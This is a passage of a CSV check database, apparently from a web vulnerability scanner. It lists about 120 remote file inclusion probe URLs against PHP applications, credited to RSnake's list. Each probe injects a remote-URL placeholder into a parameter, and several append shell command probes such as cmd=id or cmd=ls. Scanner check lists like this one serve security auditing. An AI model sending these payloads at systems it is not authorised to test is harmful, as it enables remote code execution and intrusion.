(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005015\",\"5292\",\"c\",\"/includes/init.php?includepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005016\",\"5292\",\"c\",\"/includes/iplogger.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005017\",\"5292\",\"c\",\"/includes/kb_constants.php?module_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005018\",\"5292\",\"c\",\"/includes/kb_constants.php?module_root_path=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005019\",\"5292\",\"c\",\"/includes/lang/language.php?path_to_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005020\",\"5292\",\"c\",\"/includes/lib-account.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005021\",\"5292\",\"c\",\"/includes/lib-group.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005022\",\"5292\",\"c\",\"/includes/lib-log.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005023\",\"5292\",\"c\",\"/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005024\",\"5292\",\"c\",\"/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005025\",\"5292\",\"c\",\"/includes/lib-themes.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005026\",\"5292\",\"c\",\"/includes/logger_engine.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005027\",\"5292\",\"c\",\"/includes/menuleft.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005028\",\"5292\",\"c\",\"/includes/mkb.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005029\",\"5292\",\"c\",\"/includes/morcegoCMS/adodb/adodb.inc.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005030\",\"5292\",\"c\",\"/includes/morcegoCMS/morcegoCMS.php?fichero=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005031\",\"5292\",\"c\",\"/includes/mx_common.php?module_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005032\",\"5292\",\"c\",\"/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005033\",\"5292\",\"c\",\"/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005034\",\"5292\",\"c\",\"/includes/pafiledb_constants.php?module_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005035\",\"5292\",\"c\",\"/includes/pages.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005036\",\"5292\",\"c\",\"/includes/phpdig/includes/config.php?relative_script_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005037\",\"5292\",\"c\",\"/includes/profilcp_constants.php?module_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005038\",\"5292\",\"c\",\"/includes/settings.inc.php?approot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005039\",\"5292\",\"c\",\"/includes/template.php?myevent_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005040\",\"5292\",\"c\",\"/includes/themen_portal_mitte.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005041\",\"5292\",\"c\",\"/includes/tumbnail.php?config[root_ordner]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005042\",\"5292\",\"c\",\"/includes/usercp_register.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005043\",\"5292\",\"c\",\"/includes/usercp_viewprofile.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005044\",\"5292\",\"c\",\"/includes/xhtml.php?d_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005045\",\"5292\",\"c\",\"/index.php3?Application_Root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005046\",\"5292\",\"c\",\"/index.php?1=lol&PAGES[lol]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005047\",\"5292\",\"c\",\"/index.php?AML_opensite=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005048\",\"5292\",\"c\",\"/index.php?AMV_openconfig=1&AMV_serverpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005049\",\"5292\",\"c\",\"/index.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005050\",\"5292\",\"c\",\"/index.php?ConfigDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005051\",\"5292\",\"c\",\"/index.php?DIR_PLUGINS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005052\",\"5292\",\"c\",\"/index.php?G_JGALL[inc_path]=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005053\",\"5292\",\"c\",\"/index.php?HomeDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005054\",\"5292\",\"c\",\"/index.php?Lang=AR&Page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005055\",\"5292\",\"c\",\"/index.php?Madoa=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005056\",\"5292\",\"c\",\"/index.php?RP_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005057\",\"5292\",\"c\",\"/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005058\",\"5292\",\"c\",\"/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005059\",\"5292\",\"c\",\"/index.php?abg_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005060\",\"5292\",\"c\",\"/index.php?abs_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005061\",\"5292\",\"c\",\"/index.php?abs_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005062\",\"5292\",\"c\",\"/index.php?adduser=true&lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005063\",\"5292\",\"c\",\"/index.php?adodb=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005064\",\"5292\",\"c\",\"/index.php?ads_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005065\",\"5292\",\"c\",\"/index.php?arquivo=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005066\",\"5292\",\"c\",\"/index.php?back=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005067\",\"5292\",\"c\",\"/index.php?base==@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005068\",\"5292\",\"c\",\"/index.php?basePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005069\",\"5292\",\"c\",\"/index.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005070\",\"5292\",\"c\",\"/index.php?blog_dc_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005071\",\"5292\",\"c\",\"/index.php?blog_theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005072\",\"5292\",\"c\",\"/index.php?body=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005073\",\"5292\",\"c\",\"/index.php?class_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005074\",\"5292\",\"c\",\"/index.php?classified_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005075\",\"5292\",\"c\",\"/index.php?cms=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005076\",\"5292\",\"c\",\"/index.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005077\",\"5292\",\"c\",\"/index.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005078\",\"5292\",\"c\",\"/index.php?config[root_ordner]=@RFIURL?cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005079\",\"5292\",\"c\",\"/index.php?config_atkroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005080\",\"5292\",\"c\",\"/index.php?configuration=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005081\",\"5292\",\"c\",\"/index.php?custom_admin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005082\",\"5292\",\"c\",\"/index.php?dateiPfad=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005083\",\"5292\",\"c\",\"/index.php?de=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005084\",\"5292\",\"c\",\"/index.php?dept=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005085\",\"5292\",\"c\",\"/index.php?do=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005086\",\"5292\",\"c\",\"/index.php?exec=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005087\",\"5292\",\"c\",\"/index.php?ext=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005088\",\"5292\",\"c\",\"/index.php?faq_path=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005089\",\"5292\",\"c\",\"/index.php?file_name[]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005090\",\"5292\",\"c\",\"/index.php?file_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005091\",\"5292\",\"c\",\"/index.php?fileloc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005092\",\"5292\",\"c\",\"/index.php?from=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005093\",\"5292\",\"c\",\"/index.php?func=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005094\",\"5292\",\"c\",\"/index.php?function=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005095\",\"5292\",\"c\",\"/index.php?function=custom&custom=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005096\",\"5292\",\"c\",\"/index.php?gOo=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005097\",\"5292\",\"c\",\"/index.php?gen=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005098\",\"5292\",\"c\",\"/index.php?get=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005099\",\"5292\",\"c\",\"/index.php?home_name=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005100\",\"5292\",\"c\",\"/index.php?ilang=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005101\",\"5292\",\"c\",\"/index.php?inc_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005102\",\"5292\",\"c\",\"/index.php?inc_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005103\",\"5292\",\"c\",\"/index.php?includeDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005104\",\"5292\",\"c\",\"/index.php?includeFooter=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005105\",\"5292\",\"c\",\"/index.php?includesdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005106\",\"5292\",\"c\",\"/index.php?insPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005107\",\"5292\",\"c\",\"/index.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005108\",\"5292\",\"c\",\"/index.php?language=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005109\",\"5292\",\"c\",\"/index.php?language=en&main_page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005110\",\"5292\",\"c\",\"/index.php?lizge=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005111\",\"5292\",\"c\",\"/index.php?lng=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005112\",\"5292\",\"c\",\"/index.php?load=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005113\",\"5292\",\"c\",\"/index.php?loadpage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005114\",\"5292\",\"c\",\"/index.php?main_tabid=1&main_content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005115\",\"5292\",\"c\",\"/index.php?may=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005116\",\"5292\",\"c\",\"/index.php?middle=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005117\",\"5292\",\"c\",\"/index.php?mode=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005118\",\"5292\",\"c\",\"/index.php?mode=@RFIURL?&cmd=\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005119\",\"5292\",\"c\",\"/index.php?modpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005120\",\"5292\",\"c\",\"/index.php?module=PostWrap&page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005121\",\"5292\",\"c\",\"/index.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005122\",\"5292\",\"c\",\"/index.php?news7[\\\"functions\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005123\",\"5292\",\"c\",\"/index.php?news_include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005124\",\"5292\",\"c\",\"/index.php?open=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005125\",\"5292\",\"c\",\"/index.php?option=com_custompages&cpage=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005126\",\"5292\",\"c\",\"/index.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005127\",\"5292\",\"c\",\"/index.php?page=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005128\",\"5292\",\"c\",\"/index.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005129\",\"5292\",\"c\",\"/index.php?page@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005130\",\"5292\",\"c\",\"/index.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005131\",\"5292\",\"c\",\"/index.php?pagename=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005132\",\"5292\",\"c\",\"/index.php?pager=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005133\",\"5292\",\"c\",\"/index.php?pagina=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005134\",\"5292\",\"c\",\"/index.php?path_to_folder=@RFIURL?cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005135\",\"5292\",\"c\",\"/index.php?pg=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005136\",\"5292\",\"c\",\"/index.php?pg=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 